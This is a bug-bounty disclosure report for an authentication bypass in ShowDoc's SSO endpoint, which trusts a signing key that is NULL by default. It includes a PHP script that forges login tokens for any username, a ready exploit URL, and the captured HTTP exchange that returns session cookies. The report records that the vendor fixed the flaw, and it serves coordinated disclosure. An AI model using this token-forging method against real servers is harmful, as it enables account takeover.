Authentication Bypass Using an Alternate Path or Channel in star7th/showdoc

Valid

Reported on

Oct 13th 2021


Description

In showdoc, there is a SSO process , DOC is shown in https://www.showdoc.com.cn/p/0fb2753c5a48acc7c3fbbb00f9504e6b

While the authorization is implemented with a LoginSecretKey, the common use should be :

http://{{host}}/server/?s=/api/extLogin/bySecretKey&username={{username}}&time={{time}}&token={{token}}&redirect={{redirect}}

While dealing above URI, the server will check whether the signature is valid, using the $login_secret_key

A valid signature should be generated by:
    $token = md5($username.$login_secret_key.$time);

But as you can see in https://github.com/star7th/showdoc/blob/master/server/Application/Api/Controller/ExtLoginController.class.php#L21, If the admin has not configured the $login_secret_key yet (dafault case), the value of $login_secret_key will be NULL

public function bySecretKey(){
        $username = I("username") ;  //KNOWN
        $key = I("key") ; 
        $time = I("time") ;  //KNOWN
        $token = I("token") ;  //CONTROLLED by us
        $redirect = I("redirect") ; 


        if($time < (time() - 60) ){
            $this->sendError(10101,"已过期");
            return ;
        }
        $login_secret_key = D("Options")->get("login_secret_key") ; //$login_secret_key =NULL by default, KNOWN

        $new_token = md5($username.$login_secret_key.$time);   //Forge signature
        if($token !=  $new_token){
            $this->sendError(10101,"token不正确");
            return ;
        }

Since we retrieve the value of $login_secret_key ,we could forge any valid signature in the default-installed showdoc server,logging in as any existing user!

By exploiting this vuln, an attacker could achieve:

Proof of Concept

Visit the following link

http://showdoc/server/?s=/api/extLogin/bySecretKey&username=test_user&time=1734103451&token=4726c0b9a759feeef55d64cb279818eb&redirect=

Or generate poc URL by this script

<?php
        //  Credit:Qianxin, Network Security Department, Product-Safety Team ( Unc1e )
    /*  ShowDoc v2.9.10 Auth Bypass PoC #1
    *       Date:2021/10/13
    */
    $username = 'test_user' ;
    $time = time() + 18000 ;
    $login_secret_key = NULL;
    
    $token = md5($username.$login_secret_key.$time);
    
    
    echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=".PHP_EOL;// Please replace the [showdoc] to your target

?>

HTTP request

GET /server/?s=/api/extLogin/bySecretKey&username=test_user&time=1634139059&token=f4e70d909ae17704ec0f63cffd2894a6&redirect= HTTP/1.1
Host: showdoc

Rsponse

HTTP/1.1 302 Found
Server: nginx/1.15.11
Date: Wed, 13 Oct 2021 10:48:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.3.4
Set-Cookie: PHPSESSID=i893g37c56c92dmompidfttked; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: cookie_token=e2154f0de2a87a7f49f3de532cd8fefc4a1b134e4a2213d8423dde57220e9179; expires=Mon, 11-Apr-2022 10:48:02 GMT; Max-Age=15552000; path=/; HttpOnly
location: ../web/#/item/index
Content-Length: 0


Notice: Please Do Not visit the SSO manage part of the admin panel, because it will initialize the key once you GET it. image.png

Impact

This vulnerability is capable of

  • Login arbitrary existing account
  • Register unlimtedly, bypass CAPTCHA
    • We could register unlimited account without using CAPTCHA
We have contacted a member of the star7th/showdoc team and are waiting to hear back 13 days ago
star7th validated this vulnerability 13 days ago
hi-unc1e has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th confirmed that a fix has been merged on 19a0a0 13 days ago
star7th has been awarded the fix bounty